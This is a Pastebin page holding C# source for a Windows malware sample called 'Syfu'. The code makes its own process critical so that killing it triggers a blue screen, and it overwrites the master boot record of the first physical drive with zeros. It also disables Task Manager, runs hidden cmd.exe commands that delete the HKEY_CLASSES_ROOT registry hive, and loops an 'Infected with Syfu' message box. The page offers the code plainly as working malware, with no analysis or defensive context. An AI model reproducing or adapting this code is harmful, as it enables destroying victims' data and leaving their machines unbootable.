Advertisement
FlyFar

Syfu.cs

Jun 12th, 2023
789
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 3.81 KB | Cybersecurity | 0 0
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Linq;
  4. using System.Text;
  5. using System.Threading.Tasks;
  6. using System.Drawing;
  7. using System.Windows.Forms;
  8. using System.Threading;
  9. using System.IO;
  10. using System.Runtime.InteropServices;
  11. using System.Diagnostics;
  12. using Microsoft.Win32;
  13.  
  14. namespace SyFu
  15. {
  16.     public class Class1
  17.     {
  18.         [DllImport("ntdll.dll", SetLastError = true)]
  19.         private static extern int NtSetInformationProcess(IntPtr hProcess, int processInformationClass, ref int processInformation, int processInformationLength);
  20.  
  21.         [DllImport("kernel32")]
  22.         private static extern IntPtr CreateFile(
  23.             string lpFileName,
  24.             uint dwDesiredAccess,
  25.             uint dwShareMode,
  26.             IntPtr lpSecurityAttributes,
  27.             uint dwCreationDisposition,
  28.             uint dwFlagsAndAttributes,
  29.             IntPtr hTemplateFile);
  30.  
  31.         [DllImport("kernel32")]
  32.         private static extern bool WriteFile(
  33.             IntPtr hFile,
  34.             byte[] lpBuffer,
  35.             uint nNumberOfBytesToWrite,
  36.             out uint lpNumberOfBytesWritten,
  37.             IntPtr lpOverlapped);
  38.  
  39.         private const uint GenericRead = 0x80000000;
  40.         private const uint GenericWrite = 0x40000000;
  41.         private const uint GenericExecute = 0x20000000;
  42.         private const uint GenericAll = 0x10000000;
  43.  
  44.         private const uint FileShareRead = 0x1;
  45.         private const uint FileShareWrite = 0x2;
  46.  
  47.         private const uint OpenExisting = 0x3;
  48.  
  49.         private const uint FileFlagDeleteOnClose = 0x4000000;
  50.  
  51.         private const uint MbrSize = 512u;
  52.  
  53.         public static void Main()
  54.         {
  55.             //BSOD on termination
  56.             int isCritical = 1;
  57.             int BreakOnTermination = 0x1D;
  58.             Process.EnterDebugMode();
  59.             NtSetInformationProcess(Process.GetCurrentProcess().Handle, BreakOnTermination, ref isCritical, sizeof(int));
  60.  
  61.             Class1 mbr_nostatic = new Class1();
  62.             Thread mbr = new Thread(mbr_nostatic.mbr_destory);
  63.  
  64.             Class1 reg_dest = new Class1();
  65.  
  66.             Class1 msg_loop_static = new Class1();
  67.             Thread msg_looping = new Thread(msg_loop_static.msg_box);
  68.  
  69.             mbr.Start();
  70.             reg_dest.reg_destory();
  71.             msg_looping.Start();
  72.         }
  73.         public void mbr_destory()
  74.         {
  75.             var mbrData = new byte[MbrSize];
  76.             var mbr = CreateFile("\\\\.\\PhysicalDrive0", GenericAll, FileShareRead | FileShareWrite, IntPtr.Zero,
  77.                 OpenExisting, 0, IntPtr.Zero);
  78.  
  79.             try
  80.             {
  81.                 WriteFile(mbr, mbrData, MbrSize, out uint lpNumberofBytesWritten, IntPtr.Zero);
  82.             }
  83.             catch { }
  84.         }
  85.  
  86.         public void reg_destory()
  87.         {
  88.             RegistryKey key = Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System");
  89.             key.SetValue("DisableTaskMgr", 1, RegistryValueKind.DWord);
  90.             key.Close();
  91.  
  92.             const string quote = "\"";
  93.             ProcessStartInfo ctrl = new ProcessStartInfo();
  94.             ctrl.FileName = "cmd.exe";
  95.             ctrl.WindowStyle = ProcessWindowStyle.Hidden;
  96.             ctrl.Arguments = @"/k regedit /s" + quote + @"C:\Program Files\Temp\disctrl.reg" + quote + " && exit";
  97.             Process.Start(ctrl);
  98.  
  99.             ProcessStartInfo reg_kill = new ProcessStartInfo();
  100.             reg_kill.FileName = "cmd.exe";
  101.             reg_kill.WindowStyle = ProcessWindowStyle.Hidden;
  102.             reg_kill.Arguments = @"/k reg delete HKCR /f";
  103.             Process.Start(reg_kill);
  104.         }
  105.         public void msg_box()
  106.         {
  107.             while (true)
  108.             {
  109.                 MessageBox.Show("Infected with Syfu");
  110.             }
  111.         }
  112.     }
  113. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement